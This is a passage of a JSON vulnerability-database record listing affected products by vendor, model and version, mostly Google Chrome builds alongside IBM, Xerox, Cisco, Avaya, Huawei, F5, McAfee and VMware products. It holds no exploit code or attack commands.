"ibm", "version": "2.14" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.812.0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7245" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.944.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.635.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.89" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5955" }, { "model": "oceanstor s3900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1660.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1047.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.44" }, { "model": "aura communication manager ssp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.473.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.441.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.1" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "oceanstor s5500t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1040" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1037.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.0" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.53" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.426.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.752.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.43" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.5" }, { "model": "oceanstor n8500 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.834.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.327.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.112" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "oceanstor s5800t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "t410 all-in-one rfx/hdx smart zc", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.15" }, { "model": "webex node", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.493.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.103" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.327" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.186" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.10" }, { "model": "ipso ngx r65", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.956.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.217" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491036" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.108" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.7" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system storage san768b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-384" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.522.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.38" }, { "model": "data center analytics framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.94" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.30" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.1" }, { "model": "fusioncompute v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.159" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "mirage gateway", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.152.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.556.0" }, { "model": "oceanstor vtl3500 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.53" }, { "model": "identity engines ignition server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.772.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1059.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.29" }, { "model": "ipso r70", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.398.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.140" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.53" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.321" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.870.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1006.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.91" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14127" }, { "model": "secure access remote access concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1653.1" }, { "model": "virtualization experience client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "62150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1083.0" }, { "model": "nexus virtual supervisor module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.301" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.335" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.695.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1021" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.325" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.732.0" }, { "model": "video distribution suite for internet streaming vds-is", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.26" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.712.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.558.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.822.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.120" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.665.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.629.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.13974" }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.0" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.339" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.763.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.947.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.168" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.878.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.542.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.48" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.837.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1014" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.43" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "high-density server xh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.929.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.324" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.510.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.1549" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.410.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.787.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.323" }, { "model": "oceanstor 9000e v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.82" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.405.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.796.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.153.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.4" }, { "model": "enterprise linux long life server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.6" }, { "model": "ios-xe for catalyst 3k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.123" }, { "model": "gaia embedded r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7830" }, { "model": "system networking san96b-5 2498-f96", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.103" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.757.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.40" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8900" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.832.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1066.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.50" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.55" }, { "model": 